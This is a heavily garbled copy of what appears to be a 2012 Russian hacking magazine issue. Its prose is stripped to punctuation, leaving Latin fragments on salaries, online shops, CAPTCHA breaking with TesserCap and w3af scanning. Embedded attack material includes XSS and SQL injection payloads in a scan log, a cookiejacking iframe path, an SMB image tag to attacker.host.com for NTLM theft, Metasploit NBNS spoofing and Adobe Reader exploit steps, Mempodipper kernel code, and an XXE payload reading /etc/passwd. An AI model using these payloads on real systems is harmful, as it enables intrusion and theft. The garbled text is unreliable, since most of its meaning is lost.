, .
: , ! !
, . ,
- ,

.
,
. .
, ,
,
.

.

, ,
. , ,
,
,
.
,
,
.
- ,
, .
. HR 90
. :
60 120
.
150, 60. .
1015 , 34
. HR
: .

. ,
. Google
,
.
.

.
, ,

033
COVER STORY
, ,
,
.

, , . ,

.
,
. , , .
, .
: ,
, ,
. ,
, ,
!. .

. , , PM, ,
.

, .
, , !
.

.

,
.
,
, , ,
, ,

.

?
, , ,
- , . , ,
.

. , .
.
, 19
: !

. ,
,

,
.
. ,
.

, .

. 30 . ?
, ,
.
, ,
:
,
, .

. , . , .
, ,
. ,
, .
, , ,
. ,
, .
,
,
,
.

,
.
, Mail.ru, - , .
,
.
, ,
. :
, . :
,
,
,
. -
. , :
,
. , ,
, , ,
- .
, 2829 , .
.
.
,
.
, Greenfield Project.
, . , ,
,
.

. ,
Mail.ru, Google
.
,
.
,
,
. ,
. ,
! :)
, , -

. .

, . ,
,
.
.
,
? , . ,
,
PRUFFI ,
.
, ,
, . z
034
03 /158/ 2012

(112011)
0-3
3-5
5-10
10
Team leader
40 000 - 80 000
30 000 - 70 000 *
70 000 - 150 000

70 000 - 180 000 *
170 000 - 250 000

180 000 - 250 000 *
250 000 - ...

250 000 - ... *

Android, iOS
30 000 - 70 000
20 000 - 70 000 *
70 000 - 120 000

50 000 - 90 000 *
120 000 - 150 000

90 000 - 120 000 *
150 000 - ...

120 000 - 150 000 *
Perl/PHP
40 000 - 60 000
30 000 - 60 000 *
70 000 - 110 000

60 000 - 100 000 *
90 000 - 150 000

90 000 - 120 000 *
150 000 - ...

120 000 - 150 000 *
Ruby on Rails
30 000 - 60 000
70 000 - 100 000
100 000 - 150 000
150 000 - ...
0-3
3-5
5-10
10
Windows
30 000 - 50 000
50 000 - 70 000
80 000 - 100 000
100 000 - ...
Unix,Linux admin
30 000 - 60 000
20 000 - 60 000 *
60 000 - 90 000
60 000 - 90 000 *
90 000 - 110 000

90 000 - 110 000 *
110 000 - ...

130 000 - 150 000 *
DBA (Oracle, MySql, Postgres

..)
40 000 - 80 000
40 000 - 80 000 *
80 000 - 130 000

80 000 - 130 000 *
130 000 - 150 000

130 000 - 150 000 *
150 000 - 180 000

150 000 - 180 000 *
90 000 - 150 000

90 000 - 150 000 *
150 000 - 180 000

150 000 - 180 000 *
180 000 - 250 000

180 000 - 250 000 *
0-3
3-5
5-10
10
40 000 - 80 000
40 000 - 80 000 *
80 000 - 150 000

80 000 - 130 000 *
150 000 - 200 000

130 000 - 150 000 *
200 000 - ...

150 000 - 180 000 *
Flash-
40 000 - 80 000
40 000 - 80 000 *
80 000 - 150 000

80 000 - 150 000 *
150 000 - 200 000

150 000 - 200 000 *
200 000 - ...

200 000 - 230 000 *
Game producer
40 000 - 70 000
40 000 - 90 000 *
70 000 - 120 000

90 000 - 120 000 *
120 000 - 200 000

120 000 - 150 000 *
200 000 - ...

150 000 - 180 000 *
PRUFFI (www.pruffi.ru/analitika)
GAME
50%
50%
50%
03 /158/ 2012
035
Preview
33 .
.
PCZONE
38
?

,
-?
eBay!

.
.

.

,
.
-
.
PC ZONE
I can
crack
it!
42

CAPTCHA.
, OCR-?
70
036

--
,
.
48

, ,
, ,
IDS ,
w3af.
66
I CAN CRACK IT!

. .
MALWARE
76

2011
.
?
82

Windows Phone 7.5
. ?

Microsoft.
03 /158/ 2012
PC ZONE
(biohedge@gmail.com)

?

Android?
? , , ?
? ,
, ,
-. , ,
.
MADE IN CHINA
Made in China
, .
, ,
. ,

DealExtreme.com,
.
.
038
,
, .
,
.
,
, ,
-

, . ,
, . ?
03 /158/ 2012
FocalPrice.com
:
:
( )
:
14 25

70 000 100 (, ). , .
, ,
, .

( ),
( , ).
, , .
, eBay (-,

,
). ,
-.
,

, - ,
.
,
,
.
,

, .
,
, .
PayPal.
FocalPrice
WebMoney, .
,
,
.
, ,
.
, , , . ,
. $20,
- .
, , ,

: , , .

1. .
: retailmenot.com (,
), chinaprices.ru, . ,
< >.
2. ,
. searchsku.ru
. chinaprices.ru.
3. ,
. . , .
, ebay-forum.ru mySku.ru.
4. - (, , )
.
.
5. .
PayPal. WebMoney Qiwi, ,
, PayPal
.
6. , . ,
. , ,
- .
03 /158/ 2012

PayPal
WebMoney
Qiwi

039
PC ZONE
Dealextreme.com
:
:
:
21 40
DealExtreme.com.

- .
:
, , ,
, . :
. ,
. ,
. TinyDeal,

,
.
PayPal ,
.
-,
$15.
, :
Dealextreme ,
: ( ),
.
: .
,
, ,
().
. PayPal, WebMoney. ,
PayPal
, .
$150.
.
, ,- (, ,
). -
$35,
: ,
-
$20.
$2-3.
,
.
: , , -
,
.
Tinydeal.com
:
:
:
7 25
- ,
,

.
, ,
. -,
,
. ,
.
,

(5-7%). (
TD Points),
.

$200
-
040
03 /158/ 2012
Pandawill.com
:
:
:
25 35
-, . , ,
. , .

,

, .
(
).
Pandawill

, ,
.

.
PayPal Visa Master Card,

. . , ,
-:

$50 (
).
:
,
.

NOWSUPPLIER.COM
MERIMOBILES.COM
BUYINCOINS.COM
7 25

,
:
,
( $30 )
.
, ,
-
. , PayPal
, .
,
,
.
.
,
03 /158/ 2012
14 25
7 25
-
. ,
.
, 3G-
.
, PayPal ,

.
(, ,
) ,
.
.
.
,
FocalPrice
TinyDeal.
.
:
.
,
PayPal.
. :
- ,
. -
, .
: , , .
! z
041
PC ZONE
( gursev.kalra@foundstone.com )
CAPTCHA

CAPTCHA,
. -,
,

$1
1000 .

,

.

.
042
CAPTCHA
CAPTCHA
.
, , .
(,
, , ),
.
, ,

CAPTCHA: . ,
-
. Captcha- #135 #126

.
TesserCap,
CAPTCHA. , .
TESSERCAP
? ,
CAPTCHA
.
, ,
,
. -
CAPTCHA- TesserCap
03 /158/ 2012
, ,

, OCR-
,
. ,
,
McAfee. ?
,
.
-,

www.quantcast.com/top-sites-1.

, Wikipedia, eBay,
reCaptcha.

,
.
,
OCR-,
. TesserCap

:
1. ,

.
2.
Tesseract , CAPTCHA-.
3.
.
, ,
, .
,
.
, ,

.
. MAIN
: Main, Options,
Image Preprocessing.
,

CAPTCHA-, ( ,
),
.
URL- URL, -
. URL- :
CAPTCHA-,

URL- src <img>. , xakep.
ru www.xakep.ru/common/rateit/
captcha.asp?name=xakep.ru. ,
,
.
12 ,

. ,
. Start
Stop .

TesserCap.
.

Foundstone,
McAfee.
, ToorCon, NullCon ClubHack.
TesserCap SSLSmart.
,
.
Ruby, Ruby on Rails C#.
03 /158/ 2012
xakep.ru
. ,

Foundstone, ,
,

.

,

.

,
. ,
,
, .
,

Send To Image Preprocessor.
. OPTIONS

TesserCap.
OCR-,
-, , HTTP,
: ,
, ,
.
.
, OCR-.

Tesseract-ORC,
.
. , , xakep.ru , ,
. ,
? ,
,
xakep.ru ,
: Numerics.
Upper Case? ,
? , . , , ,
\Program Files\Foundstone
Free Tools\TesserCap 1.0\tessdata\configs\.
:
Numerics Lower Case,
lowernumeric, tessedit_char_whitelist.
043
PC ZONE
,
.

,
.
,
Http Request Headers. , - ,
. TesserCap
,
HTTP
, Accept, Cookie Referrer
. . - (Fiddler, Burp,
Charles, WebScarab, Paros . .),
Http Request
Headers. , , Follow Redirects.
, TesserCap
.
URL-
,
.
, / ,
.

.
CAPTCHA-
. CAPTCHA-,
Enable
Image Preprocessing,
OCR- Tesseract
.
. IMAGE
PREPROCESSING

.
,
.

.

.
, ,

.
.
1.

CAPTCHA-. ,
, ,
:
for(each pixel in CAPTCHA)
{
if (invertRed is true)
new red = 255 current red
if (invertBlue is true)
new blue = 255 current blue
if (invertGreen is true)
new green = 255 current green
}

CAPTCHA-.
2.

CAPTCHA
Wikipedia
2030%
Ebay
2030%
reddit.com
2030%
CNBC
>50%
foodnetwork.com
8090%
dailymail.co.uk
>30%
megaupload.com
>80%
pastebin.com
7080%
cavenue.com
>80%
.
257
( -1 255) . RGB

:
1. -1,
.
2. -1,
(, )
. 0
, 255
. .
3. ( )
.
, .
,

:
1. Average (Red + Green + Blue)/3.
2. Human (0.21 * Red + 0.71 * Green + 0.07 *
Blue).
3. Average of minimum and maximum color
components (Minimum (Red + Green + Blue)
+ Maximum (Red + Green + Blue))/2.
4. Minimum Minimum (Red + Green + Blue).
5. Maximum Maximum (Red + Green + Blue).
CAPTCHA

.
044
4.

CAPTCHA-,
03 /158/ 2012
, .
,

Bucket Cutoff.
Passes ,
.

. :
.
TesserCap .

( ).
.
.
,
Save Mask. ,
03 /158/ 2012
.

Save Mask .
5.

.
20 (bucket)/.
,
0 12, 0,
,
13 25,
1 . .
,
:
1. (Leave As Is).
2. (White).
3. (Black).
, / ,
.
6. (cutoff)

.

:
if (pixels grayscale value <= Cutoff)
pixel grayscale value = (0 OR 255)
-> ,
(<= => : Set Every Pixel
with value <=/=> Threshold to 0.
Remaining to 255)
CAPTCHA
.
7: (chopping)
, , bucket- CAPTCHA

, .
045
PC ZONE
: ,
,
, 0 ()
255 () .
CAPTCHA , .
,
.
OCR-.
8: .
,
TesserCap ,
, CAPTCHA-
CAPTCHA,
OCR .

.
, ,
.
10:
CAPTCHA-
OCR- .
Solve
, OCR-
.
, ,
.

(Enable Image Preprocessing)

.
9:
-
046
for(each pixel in CAPTCHA)

new grayscale value = 255 current
grayscale value

, ,
, - .
xakep.ru.
,
. ,
, . , (
, )
. , ,
. URL

TesserCap. , 12
, Start.
12 . ,
,
-Failed- ,
. , ,

. .
12
03 /158/ 2012
(Send To Image
Preprocessor).
12 , , , ,
(Character Set = Numerics).
Image Preprocessing
. ,

( , ,
) ,
. Smooth Mask
2
. Grayscale buckets
. 154 , ,
, 0, ,
, 255.
, chopping 10.
,
Solve.
714945,
711435.
03 /158/ 2012
, , .
, ,
.
pastebin.
com, .
xakep.ru,

(Enable Image Preprocessing).
Main , Start,
, . , ,
/ ( Mark as Correct/Mark as
InCorrect). Show Statistics. -,

CAPTCHA. , TesserCap
.
CAPTCHA-

- .

. ,
CAPTCHA-, ,
. ,
,
reCaptcha .
,
,
CAPTCHA.
API , .
(, ), .
:). z
047
PC ZONE
(oxdef@oxdef.info)
-

- W3AF
WARNING

.

.
w3af

-.

, ,

,
.
W3AF?
- , . , , ,
,
. , ,
. , -:
1. .
2. ().
3. .
4. .
w3af (w3af.org).
- (Web Application
Attack and Audit Framework),
.
.
, :).
,
Rapid7 ! Python, ,
, . w3af
, . , ,
Mozilla Firefox, .
W3AF?
w3af
048
w3af : .
,
03 /158/ 2012
w3af
. , ,
.
, , .
.
. W3af , .
,
. , , .
1. (
discovery-) ,
, -. . -,
webSpider. Discovery- , , , .
,
, .
2. - (
) , , XSS, SQL-, (R)LFI
.
3. Grep- , , UNIX-, . :
grep- HTTP-/,
(
, IP-,
. .).
JavaScript-, :
document.write
document.location
eval
...
DOM based XSS (www.owasp.org/index.php/

DOM_Based_XSS).
4. Bruteforce-, ,
HTTP Basic . , formLogin
,
password.
.
5. Attack- ,
. , ,
, , . -,
. ;)
6. Mangle- -
03 /158/ 2012
- .
UNIX,
sed, HTTP-. hidden- ? !
7. Evasion- IDS. -?
- .
8. Output- : w3af. ,

PDF, - .
9. Auth- : -,
, ,
-.
.
-,
, . , w3af
,
. w3af
auth-, .
, ,
:
SMS, .. Python!
-
, w3af,
. ,
Itter. ,
, , , ,
140 . :)
- :
LAMP (Linux-Apache-MySQL-PHP);
;

;
AJAX;
, , !

- . w3af (,
, ) :
gtkUi , GTK;
consoleUi UI (
, ).
. GUI- ./w3af_gui - 1. :
, , . .
049
PC ZONE
w3af
- w3af
, ,
w3af. , ini-,
w3af, URL, , core-
. , Itter
My Profile, discovery webSpider pykto ( Nikto Python),
grep- DOM XSS
XSS- SQL-. , Start
, . , w3af Log,

. -
.
20 . ,
w3af.
DOM XSS, XSS!
, /index.php, , . Pykto, ,
Apache phpinfo- /test.php.
-
-. Apache/2.2.16 Debian GNU/
Linux PHP. ,
-, URLs -
. HTTP-,
.
Suite, Firefox Tamper Data.

( ) HTTP- - . , w3af.
, :
discovery- spiderMan;
Intercepting Proxy .
2.0
,
-.
-,
JavaScript, AJAX, JSON, HTML5 .
:)
-.
.
- /article.php?id=68,
, , ,
-. , , <Ctrl-U>,
HTML-,
JavaScript HTML.
-, .

-. ,
JS -? ,
Selenium/WebDriver?

, OWASP WebScarab Burp
050
spiderMan, ,
, discovery-.
. . - 127.0.0.1:44444
( FoxyProxy Firefox,
). SpiderMan
webSpider,
. spiderMan , -. Log- :
[Mon 30 May 2011 12:08:22 AM MST] spiderMan proxy is running
on 127.0.0.1:44444.
Please configure your browser to use these proxy settings and
navigate the target site. To exit spiderMan plugin please
navigate to http://127.7.7.7/spiderMan?terminate .
[Mon 30 May 2011 12:15:29 AM MST] The user is navigating
through the spiderMan proxy.
[Mon 30 May 2011 12:15:29 AM MST] Trapped fuzzable requests:
[Mon 30 May 2011 12:15:29 AM MST] http://localhost/index.php
| Method: GET
[Mon 30 May 2011 12:15:32 AM MST] http://localhost/user-info.
php | Method: GET
[Mon 30 May 2011 12:22:36 AM MST] SQL injection in a MySQL
database was found at: "http://localhost/user-info.php",
using HTTP method GET. The sent data was: "id=d'z"0".
This vulnerability was found in the request with id 3911.
[Mon 30 May 2011 12:27:10 AM MST] Cross Site Scripting was
found at: "http://localhost/index.php", using HTTP
method GET. The sent data was: "limit=15&u=<ScRIPT>
a=/UzmE/%0Aalert(a.source)</SCRiPT>". The modified parameter
was "u". This vulnerability affects ALL browsers. This
vulnerability was found in the request with id 4042.
, spiderMan, , webSpider
. , - SQL XSS-! , AJAX-,
.
. W3af
, ,
. -
03 /158/ 2012
Exploit . SQL- sqlmap

(sqlmap.sourceforge.net), w3af.

HTTP-
: Telnet, cURL, Wget, Python + urll ib,
, :) , . w3af
.
HTTP- ? !
Python. HTTP-,
HTTP-,
.
- URL MD5. , echo -n "admin" | md5sum
, . SQL-
-,
diff. , , ,
,
HTML, AJAX Python. , : , ,
JS-
. -
( ).
History HTTP . , , .
:
, , , 2xx- .
.
,
.
AJAX-
/user-info.php?id=1, . .
Audit request with... , SQL-.
03 /158/ 2012
SQL-
! SQL-. :) , ,
.
. PHP
, . HTTP-
-: /user-info.php?id=1 /user-info.
php?id=1%2b1,
. SQL-
,
( ).
.
OUTRO
W3af
-. ,
.
, ,
, .
, Python,
.
, , w3af , .
,
(w3af.sourceforge.net) IRC- #w3af
Freenode. z
w3af HTTP-
051
/ EASY HACK
GreenDog , Digital Security (twitter.com/antyurin)
EASY
HACK
MSSQL
Microsoft SQL server .

.
1. Microsoft, SQL server
: integrated (sign-on), , native, , .
.
2. , ,
. , , . ,
. ,
,
arp-spoofing ? ,
- . .
f0rki (bit.ly/
sBg07r). , . , MSSQL Tabular DataStream protocol
(bit.ly/z3oVPR). . ? ?
Wireshark f0rki
: SSL ( ),
TDS. .
. TDS-,
PRELOGIN.
,
. ENCRYPTION, :
052
1.
2.
3.
4.
, : ENCRYPT_OFF 0x00.
: ENCRYPT_ON 0x01.
: ENCRYPT_NOT_SUP 0x02.
: ENCRYPT_REQ 0x03.
ENCRYPT_OFF. , ,
. ENCRYPT_NOT_SUP,
. ,
MiTM- ,
,
.
,
Metasploit Framework,
. , , . ,
TCP-,
MSSQL- ,
, , , . ,
, ,
arp-spoofing-,
. f0rki ,
shell-.
03 /158/ 2012
EASY HACK
UI-REDRESSING
][ ,
clickjacking. ,
. clickjacking
, , uiredressing . ,
, .
, cookiejacking.
Rosario Valotta HITB 2011
. , , HTTPS-! :
IE ( ).
, -.
-, 0-day,
IE. ,
. , IE
, : Internet, Intranet,
. .
, NTLM-
Intranet . , :
Local Machine Zone
Local Intranet Zone
Trusted Sites Zone
Internet Zone
Restricted Sites Zone

- . ,
. , <iframe
src="file://c:/boot.ini">
.
0-day , -
,
. ,
:
<iframe src="file:///C://Documents and Settings/
%user_name%/Cookies/%user_name%@google[1].txt"> </iframe>
%user_name% .
, . , Google,
.
-, 0-day-,
clickjacking' content extraction ( BlackHat Europe 2010, goo.gl/Z8YNw).
? iframe ,
.
- , - ,
iframe localhost .
. drag & drop,
.
, , ,
. -
. , content extraction , ,
drag & drop. clickjacking-
, , , .
03 /158/ 2012
( Rosario )
(). iframe ,
.
. iframe scrollspeed
. , ,
, () iframe
. , ,
iframe,
, drag & drop', . ,
, Rosario Valotta
(bit.ly/iNxvTb), , , content extraction, JavaScript.
, .
. -,
Windows, :). XP
Vista/7 . XP C://Documents and
Settings/%user_name%/Cookies,
C:/Users/% user_name %/AppData/Roaming/Microsoft/Windows/
Cookies. , ,
User-Agent, .
,
JavaScript. -, , , ,
, .
SMB.
.

: <img src="\\attacker.host.com\any.jpg"></img>.
,
445 , web. , !
.
. 2012-, Microsoft
IE 2011-. ,
Microsoft
.
user_name@domain[counter].txt 87TVLBDW.txt.
. , ,

, IE.
053
/ EASY HACK
( ).

. ,
, ?
, .
,
.
,

,
. , makensi.es/stf.
-,
, , .
WordPress
DNS NETBIOS
, IP-
DNS.
( ),
. DNSSEC,
, . DNS ,
arp-poisoning,
,
. ,
- , . , , IDS, , -
. ,
.
. , XXX.COM. , , ,
Windows IP- .
IP , hosts (C:\Windows\System32\drivers\etc\hosts). ,
, DNS-. Windows , NetBIOS Name Service.

, NetBIOS Windows ,
NetBIOS Name Service (NBNS) ,
NetBIOS IP-.
WINS-, (, ).
DNS-
. , NBNS
. DNS- ,
XXX.COM DNS-?

:
(.com, .ru). ?
, , , ,
- . , ,
(, ),

. ,
DNS-
URL
054
03 /158/ 2012
EASY HACK
NBNS-
, .
NBNS-.
Transaction ID NBNS-. ,
, , ,
. , MSF
. :
1. NetBIOS-: use auxiliary/spoof/
nbns/nbns_response.
2. : Set REGEX *google*.
3. , IP- : set spoofip xa.kep.
IP.address.
4. : run.
. (Tim Medin)
(goo.gl/Jz2Q9), NTLM-.
, ,
( makaka), (makaka.
com). Windows ( !). IE ,
. , . ,
NTLM- HTTP ( SMB):
1. : use auxiliary/server/
capture/http_ntlm.
2. , : set URIPATH.
3. , -: set SRVPORT 80.
4. : run.
. , NBNS-,
- .
c XXX.com, - ,
( JavaScript),
XXX.com. XXX.
com, ,
DNS NBNS. ,

, -
.
,
.
:
1. NBNS- .
2. web-
( ) , XXX.com (, asdasdasd.XXX.com).
3. , - , NBNS .
4. asdasdasd.XXX.com, , ,
NBNS.
5. XXX.com asdasdasd.XXX.com,
.
,
. ,
(XXX.com),
(.XXX.com).
LOCALHOST WINDOWS

localhost
127.0.0.1. ? , IE, , Windows. , Python urllib2
. , ,
(127.0.0.1)
(0.0.0.0).
- , Eldar Marcussen. ,
03 /158/ 2012
IE .NET framework
localhost 127.0.0.1. IE9
, -localhost.
, -, . -,
IP 127 , ,
127.1.2.3,
. -,
hosts (%windir%\drivers\etc\hosts)
localhost: 127.0.0.1 localh0st.
055
(115612, . , .1)
Linux,
, Microsoft Office Acrobat
Reader, XXE- phpMyAdmin.
!
056
Linux
CVSSV2
6.8
(AV:L/AC:L/AU:S/C:C/I:C/A:C)
BRIEF
/proc/<PID>/mem ( <PID>
), Linux
.
2.6.39 #ifdef,
, ,

.
, .
, .
, : ,
2.6.39,
.
03 /158/ 2012
int match;
rcu_read_lock();
match = (ptrace_parent(task) == current);
rcu_read_unlock();
if (match && ptrace_may_access(task,
PTRACE_MODE_ATTACH))
return mm;
EXPLOIT
/proc/<PID>/mem :
static int mem_open(struct inode* inode, struct file* file)
{
file->private_data = (void*)((long)current->self_exec_id);
file->f_mode |= FMODE_UNSIGNED_OFFSET;
return 0;
}
,
. . , ( ):
static ssize_t mem_write(struct file * file,
const char __user *buf, size_t count, loff_t *ppos)
{
/* ... */
struct task_struct *task = get_proc_task(
file->f_path.dentry->d_inode);
/* ... */
mm = check_mem_permission(task);
copied = PTR_ERR(mm);
if (IS_ERR(mm))
goto out_free;
/* ... */
if (file->private_data != (void *)((long)
current->self_exec_id))
goto out_mm;
/* ... */
: check_mem_permission self_exec_id.
check_mem_permission __check_
mem_permission, :
static struct mm_struct *__check_mem_permission(
struct task_struct *task)
{
struct mm_struct *mm;
mm = get_task_mm(task);
if (!mm) return ERR_PTR(-EINVAL);
if (task == current) return mm;
if (task_is_stopped_or_traced(task)) {
}
mmput(mm);
return ERR_PTR(-EPERM);
}
,
(task == current), , ptrace. ptrace ,
task == current.
? , suid. su:
$ su "yeeeee haw I am a cowboy"
su: user yeeeee haw I am a cowboy does not exist
, stderr ,
. , /proc/<PID>/mem,
lseek() , dup2()
/proc/<PID>/mem, ,
-. . , self_exec_id
, /proc/<PID>/mem. self_exec_id
,
.
, : fork() exec() .
self_exec_id,
. exec(), self_exec_id .
/proc/<PID >/mem,
. su
exec(), self_exec_id.
, ,

dup2 -> exec.
, . , ASLR
, :
$ readelf -h /bin/su | grep Type
Type:
EXEC (Executable file)
, su .text ( DYN, EXEC).

, su
PIE, , ASLR .text , .
Mempodipper exploit-db.com,
EDB-ID 18411. .
TARGETS
Linux >=2.6.39, 32- 64-.

SOLUTION
Mempodipper
03 /158/ 2012
057
MS12-005
CVSSV2
9.3
(AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF

.
web- Office.
Object Packager.
, Object Packager ClickOnce- ,
Office.
, . , ClickOnce
, Windows, .
ClickOnce: -,
, -.

, ,
, -
. ClickOnce
,
.

PowerPoint. Custom Animation OLE-.
,
OLE ( Object Actions): Activate
Contents ( ) Edit Package (
). Activate Contents ,
.
, Custom Animation -
,
ClickOnce- (Full Trust).

.
. Custom Animation ,
PowerPoint . PowerPoint , .
ClickOnce-
, .
EXPLOIT
, MS12-005, :
1. .
packager.dll , ,
( execExtTable).
.text:02FA1D98
; DATA XREF:
.text:02FA1D98
.text:02FA1D98
.text:02FA1D9C
.text:02FA1DA0
.text:02FA1DA4
.text:02FA1DA8
.text:02FA1DAC
.text:02FA1DB0
.text:02FA1DB4
.text:02FA1DB8
.text:02FA1DBC
.text:02FA1DC0
.text:02FA1DC4
.text:02FA1DC8
.text:02FA1DCC
.text:02FA1DD0
execExtTable dd offset a_exe

CPackage::_GetCurrentIcon(_IC *)+69|o
; CPackage::_GiveWarningMsg(HWND__ *)+5E|o
; ".exe"
dd offset a_com ; ".com"
dd offset a_bat ; ".bat"
dd offset a_lnk ; ".lnk"
dd offset a_cmd ; ".cmd"
dd offset a_pif ; ".pif"
dd offset a_scr ; ".scr"
dd offset a_js ; ".js"
dd offset a_jse ; ".jse"
dd offset a_vbs ; ".vbs"
dd offset a_vbe ; ".vbe"
dd offset a_wsh ; ".wsh"
dd offset a_sct ; ".sct"
dd offset a_vb ; ".vb"
dd offset a_wsc ; ".wsc"
Python-
058
03 /158/ 2012
.text:02FA1DD4 dd offset a_wsf ; ".wsf"

.text:02FA1DD8 dd offset a_wmz ; ".wmz"
,
, .
IsProgIDInList:
.text:02FA72F4 push 11h ; int
.text:02FA72F6 push offset execExtTable ; dangerousTable
.text:02FA72FB push esi ; pExtName
.text:02FA72FC push 0 ; int
.text:02FA72FE call ?IsProgIDInList@@YGHPBG0PBQBGI@Z
; IsProgIDInList(ushort const *,ushort const *,
; ushort const * const *,uint)
,
.
py pl. MS12-005 AssocIsDangerous(),
:
A , .
PO , , 3D-.
.text:02FA6A11 push eax

.text:02FA6A12 call ds:__imp__AssocIsDangerous@4
; AssocIsDangerous(x)
.text:02FA6A18 test eax, eax
.text:02FA6A1A jnz short loc_2FA6A42
EXPLOIT
2. .
packager.dll ,
. CPackage___
GiveWarningMsg(HWND hWnd).
execExtTable, ,
execExtTable, .
TARGETS
Windows XP, Windows Vista, Windows Server 2008 SP2, Windows 7.

SOLUTION
, .
Adobe Reader
U3D-
CVSSV2
3D- pdf-
10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)
:
4 OpenAction
JavaScript.
14 JavaScript 15.
15 JavaScript- heap spraying,
.
11 3D- .
10 3D-, (,
).
, :
10 (/3D, /U3D).
11 (/3DI, /3DD, /3D,
/3DA).
15 JavaScript- heap
spraying (
3D-).
Metasploit (
):
BRIEF
U3D-.
.

. DEP ROP-,
icucnv36.dll. ASLR JavaScript-, heap spraying.
U3D-, ,
:
U3D 3D-.
3DD () 3D-,
.
3DA () , ,
3D-.
3DI () , . true
, false JavaScript.
DIS () , 3D-
.
03 /158/ 2012
msf > use exploit/windows/fileformat/adobe_reader_u3d

msf exploit(adobe_reader_u3d) > set payload windows/exec
payload => windows/exec
msf exploit(adobe_reader_u3d) > set cmd calc.exe
cmd => calc.exe
msf exploit(adobe_reader_u3d) > show options
Module options (exploit/windows/fileformat/adobe_reader_u3d):
Name
Current Setting Required Description
------------------ -------- ----------FILENAME
msf.pdf
yes
The file name
OBFUSCATE false
no
Enable JS obfuscation
Payload options (windows/exec):
Name
Current Setting Required
------------------ -------CMD
calc.exe
yes
EXITFUNC
process
yes
Description
----------The command string to
execute
Exit technique:
seh,thread,process,none
059
/
Exploit target:
Id Name
-- ---0
Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3
msf exploit(adobe_reader_u3d) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /home/pikofarad/.msf4/local/msf.pdf
Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 Windows XP SP3.

SOLUTION
, .
LFI phpMyAdmin XXE-
CVSSV2
>
<foo>&bar;</foo>
bar, /etc/
passwd,
. , XML-
.
, . :
TARGETS
[
<!ELEMENT foo ANY >
<!ENTITY bar SYSTEM "file:///etc/passwd" >
]
5.0
(AV:N/AC:L/Au:N/C:P/I:N/A:N)
BRIEF
Marco Batista
Local File Including.
, XXE- (XXE XML eXternal Entity),
XML-.
, XML- (, GET -) XML.
xmlDB, :
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>
SQL, XXE. XML

(entities), DTD. ,
(external entities).
URI, . , URI
, , , :
<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE foo
[
<!ELEMENT foo ANY>
<!NOTATION GIF SYSTEM
"http://my-cool-site.com/ShowGif.exe">
<!ENTITY bar SYSTEM "http://not-my-cool-site.com/bar.gif"
NDATA GIF>
]
>
<foo>&bar;</foo>
ShowGif.exe bar.gif. XML-

. XML- OWASP
(goo.gl/B8G9C).
EXPLOIT
phpMyAdmin
XML-. , XML- ( -)
.
libraries\import\xml.php,
simplexml_load_string() :
$xml = simplexml_load_string($buffer,
"SimpleXMLElement", LIBXML_COMPACT);
phpMyAdmin
libxml_disable_entity_loader(), XML-.
SECFORCE Metasploit . LFI :
1. phpMyAdmin .
2. XML-, XXE-
.
3. XML-.
4. .
.
TARGETS
PhpMyAdmin 3.4.x 3.4.7.1 3.3.x 3.3.10.5.

SOLUTION
<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE foo
060
phpMyAdmin 3.4.7.1 (3.3.10.5)

. z
03 /158/ 2012
>> coding
|qbz| (http://essenzo.net)
PHP-
Windows

.
- C, ASM, - Python. ,
,

PHP. ,

,
.
,
,
- .
WWW
bit.ly/WdbrO

;
3.14.by/ru/md5

;
www.f2ko.de
.
DVD

,
.
DO U SPEAK ENGLISH? NO, PHP

, XSS,
. , ,
-, .
.
-,
. .
, .
, , .
.
, - , . 20
- .
.
.
062
03 /158/ 2012
PHP- Windows
. ,
? ,
, , . , php2exe-.

. , , . , ,
.
, ,
. , , ,
, .
, .
. ,
,
.
, ,
.
, . ,
, ,
(), .
,
, exe,
.
:
md5. { } { } { }

( = ),
, ,
. ,
, ,
- .
:
03 /158/ 2012
function mySettings()
{
$settings = file_get_contents(
'http://adres.com/?do=mysettings');
if ($settings != '')
{
list($status, $statusdata) =
explode('|', $settings, 2);
$config = array('status' => $status,
'data' => $statusdata);
return $config;
}
else
return false;
}
, , ,
, , |.
, .
():
function bruteHashes($hashes)
{
//
file_put_contents('./brute.txt', implode("\r\n", $hashes));
// ,
file_get_contents(
'http://adres.master.servera.com/?do=iamworking');
//
passthru('md5.exe brute.txt vocabulary.txt results.txt');
//
$uploader = ftp_connect('ftp://adres.master.servera.com');
ftp_login($uploader, 'login', 'password');
ftp_put($uploader, './results/'.time().'.txt',
063

'./results.txt', FTP_ASCII);
ftp_close($uploader);
// ,
file_get_contents(
'http://adres.master.servera.com/?do=iamfinished');
}
,
,
,
. ,
. ,
,
(- ), , .
, ,
. .
, :
function installVocab()
{
$vocabulary = file_get_contents(
'http://adres.com/unique_vocabulary.php');
file_put_contents('./vocabulary.txt', $vocabulary);
}
. , ,
,
:
, , ,
.
,
-.
,
-.
,
( ):
brute ;
clean ,
;
install ;
exit .
.
- 300 .
.
, , ( )
if (!file_exists('./vocabulary.txt'))
{
installVocab();
}
startScheduler();
, ,
exe. Bambalam PHP EXE
Compiler/Embedder.
, exe PHP. , , ( !).
PHP 4.0,
. Bambalam :
bamcompile [-options] infile.php [outfile.exe]
PHP DevelStudio
bit.ly/amiS4r

PHP
.

,
,

.
064
Php2exe
bit.ly/ylV4vR

PHP
.

,

php5ts.dll.
Bambalam Embedder
bit.ly/wpSniZ.
,
GUI
.

,
cURL.
py2exe
bit.ly/3KkIKw

,
, .

,
,

.
Perl2Exe
bit.ly/y29qTB

exe.

,

.
03 /158/ 2012
PHP- Windows
MD5-
, . . -,
,
, , , .
IP- (
,
, ,
NAT), ,
.
. , , ,
lastcallback. , ,
. ,
.
300 (
), ,
. . ,
, , , , |.
, ,
,
. ,
- install|vocab_123123123.txt, install
, vocab_123123123.txt
, .
, , clean. brute.

:
results,
.

.
-, ,
, ,
, .
,
: %CD%\bot.exe.
